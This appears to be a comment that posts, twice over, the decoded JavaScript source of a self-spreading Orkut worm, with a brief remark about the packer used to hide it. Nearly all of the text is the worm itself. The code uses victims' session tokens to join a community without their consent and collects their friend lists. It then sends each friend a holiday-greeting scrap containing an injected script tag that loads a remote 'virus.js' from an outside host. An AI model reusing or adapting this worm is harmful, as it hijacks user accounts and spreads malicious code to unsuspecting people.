Here is the decoded version of the above Orkut worm:
I guess Rodrigo Lacerda used the following packer to pack the javascript:
http://dean.edwards.name/packer/ ..... then modified it a little bit
<--------STARTS HERE---------->
var index = 0;
var POST = JSHDF['CGI.POST_TOKEN'];
var SIG = JSHDF['Page.signature.raw'];
function createXMLHttpRequest() {
try {
return new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
}
try {
return new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {
}
try {
return new XMLHttpRequest;
} catch (e) {
}
return null;
}
function setCookie(name, value, expires, path, domain, secure) {
var curCookie = name + "=" + escape(value) + (expires ? "; expires=" + expires.toGMTString() : "") + (path ? "; path=" + path : "") + (domain ? "; domain=" + domain : "") + (secure ? "; secure" : "");
document.cookie = curCookie;
}
function getCookie(name) {
var dc = document.cookie;
var prefix = name + "=";
var begin = dc.indexOf("; " + prefix);
if (begin == -1) {
begin = dc.indexOf(prefix);
if (begin != 0) {
return false;
}
} else {
begin += 2;
}
var end = document.cookie.indexOf(";", begin);
if (end == -1) {
end = dc.length;
}
return unescape(dc.substring(begin + prefix.length, end));
}
function deleteCookie(name, path, domain) {
if (getCookie(name)) {
document.cookie = name + "=" + (path ? "; path=" + path : "") + (domain ? "; domain=" + domain : "") + "; expires=Thu, 01-Jan-70 00:00:01 GMT";
history.go(0);
}
}
function loadFriends() {
var xml = createXMLHttpRequest();
if (xml) {
xml.open("GET", "http://www.orkut.com/Compose.aspx", true);
xml.send(null);
xml.onreadystatechange = function () {if (xml.readyState == 4) {if (xml.status == 200) {var xmlr = xml.responseText;var div = document.createElement("div");div.innerHTML = xmlr;var select = div.getElementsByTagName("select").item(0);if (select) {select.removeChild(select.getElementsByTagName("option").item(0));select.setAttribute("id", "selectedList");select.style.display = "none";document.body.appendChild(select);sendScrap();}} else {loadFriends();}}};
xml.send(null);
}
}
function cmm_join() {
var send = "POST_TOKEN=" + encodeURIComponent(POST) + "&signature=" + encodeURIComponent(SIG) + "&Action.join";
var xml = createXMLHttpRequest();
xml.open("POST", "http://www.orkut.com/CommunityJoin.aspx?cmm=" + String.fromCharCode(52, 52, 48, 48, 49, 56, 49, 56), true);
xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xml.send(send);
xml.onreadystatechange = function () {if (xml.readyState == 4) {if (xml.status != 200) {cmm_join();return;}loadFriends();}};
}
function sendScrap() {
if (index == document.getElementById("selectedList").length) {
return;
}
var scrapText = "Boas festas de final de ano!<br/><br/>[silver]" + (new Date).getTime() + "[/silver]<br/><embed src=\"http://www.orkut.com/LoL.aspx\" type=\"application/x-shockwave-flash\" wmode=\"transparent'); script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape('\" width=\"1\" height=\"1\"></embed>";
var send = "Action.submit=1&POST_TOKEN=" + encodeURIComponent(POST) + "&scrapText=" + encodeURIComponent(scrapText) + "&signature=" + encodeURIComponent(SIG) + "&toUserId=" + document.getElementById("selectedList").item(index).value;
var xml = createXMLHttpRequest();
xml.open("POST", "http://www.orkut.com/Scrapbook.aspx", true);
xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
xml.send(send);
xml.onreadystatechange = function () {if (xml.readyState == 4) {index++;var wDate = new Date;wDate.setTime(wDate.getTime() + 86400);setCookie("wormdoorkut", index, wDate);sendScrap();}};
}
if (!getCookie("wormdoorkut")) {
var wDate = new Date;
wDate.setTime(wDate.getTime() + 86400);
setCookie("wormdoorkut", "0", wDate);
}
index = getCookie("wormdoorkut");
if (getCookie("wormdoorkut") == "0") {
cmm_join();
} else {
loadFriends();
}
<--------ENDS HERE---------->
Manish S.
I guess Rodrigo Lacerda used the following packer to pack the javascript:
http://dean.edwards.name/packer/ ..... then modified it a little bit
<--------STARTS HERE---------->
var index = 0;
var POST = JSHDF['CGI.POST_TOKEN'];
var SIG = JSHDF['Page.signature.raw'];
function createXMLHttpRequest() {
try {
return new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
}
try {
return new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {
}
try {
return new XMLHttpRequest;
} catch (e) {
}
return null;
}
function setCookie(name, value, expires, path, domain, secure) {
var curCookie = name + "=" + escape(value) + (expires ? "; expires=" + expires.toGMTString() : "") + (path ? "; path=" + path : "") + (domain ? "; domain=" + domain : "") + (secure ? "; secure" : "");
document.cookie = curCookie;
}
function getCookie(name) {
var dc = document.cookie;
var prefix = name + "=";
var begin = dc.indexOf("; " + prefix);
if (begin == -1) {
begin = dc.indexOf(prefix);
if (begin != 0) {
return false;
}
} else {
begin += 2;
}
var end = document.cookie.indexOf(";", begin);
if (end == -1) {
end = dc.length;
}
return unescape(dc.substring(begin + prefix.length, end));
}
function deleteCookie(name, path, domain) {
if (getCookie(name)) {
document.cookie = name + "=" + (path ? "; path=" + path : "") + (domain ? "; domain=" + domain : "") + "; expires=Thu, 01-Jan-70 00:00:01 GMT";
history.go(0);
}
}
function loadFriends() {
var xml = createXMLHttpRequest();
if (xml) {
xml.open("GET", "http://www.orkut.com/Compose.aspx", true);
xml.send(null);
xml.onreadystatechange = function () {if (xml.readyState == 4) {if (xml.status == 200) {var xmlr = xml.responseText;var div = document.createElement("div");div.innerHTML = xmlr;var select = div.getElementsByTagName("select").item(0);if (select) {select.removeChild(select.getElementsByTagName("option").item(0));select.setAttribute("id", "selectedList");select.style.display = "none";document.body.appendChild(select);sendScrap();}} else {loadFriends();}}};
xml.send(null);
}
}
function cmm_join() {
var send = "POST_TOKEN=" + encodeURIComponent(POST) + "&signature=" + encodeURIComponent(SIG) + "&Action.join";
var xml = createXMLHttpRequest();
xml.open("POST", "http://www.orkut.com/CommunityJoin.aspx?cmm=" + String.fromCharCode(52, 52, 48, 48, 49, 56, 49, 56), true);
xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xml.send(send);
xml.onreadystatechange = function () {if (xml.readyState == 4) {if (xml.status != 200) {cmm_join();return;}loadFriends();}};
}
function sendScrap() {
if (index == document.getElementById("selectedList").length) {
return;
}
var scrapText = "Boas festas de final de ano!<br/><br/>[silver]" + (new Date).getTime() + "[/silver]<br/><embed src=\"http://www.orkut.com/LoL.aspx\" type=\"application/x-shockwave-flash\" wmode=\"transparent'); script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape('\" width=\"1\" height=\"1\"></embed>";
var send = "Action.submit=1&POST_TOKEN=" + encodeURIComponent(POST) + "&scrapText=" + encodeURIComponent(scrapText) + "&signature=" + encodeURIComponent(SIG) + "&toUserId=" + document.getElementById("selectedList").item(index).value;
var xml = createXMLHttpRequest();
xml.open("POST", "http://www.orkut.com/Scrapbook.aspx", true);
xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
xml.send(send);
xml.onreadystatechange = function () {if (xml.readyState == 4) {index++;var wDate = new Date;wDate.setTime(wDate.getTime() + 86400);setCookie("wormdoorkut", index, wDate);sendScrap();}};
}
if (!getCookie("wormdoorkut")) {
var wDate = new Date;
wDate.setTime(wDate.getTime() + 86400);
setCookie("wormdoorkut", "0", wDate);
}
index = getCookie("wormdoorkut");
if (getCookie("wormdoorkut") == "0") {
cmm_join();
} else {
loadFriends();
}
<--------ENDS HERE---------->
Manish S.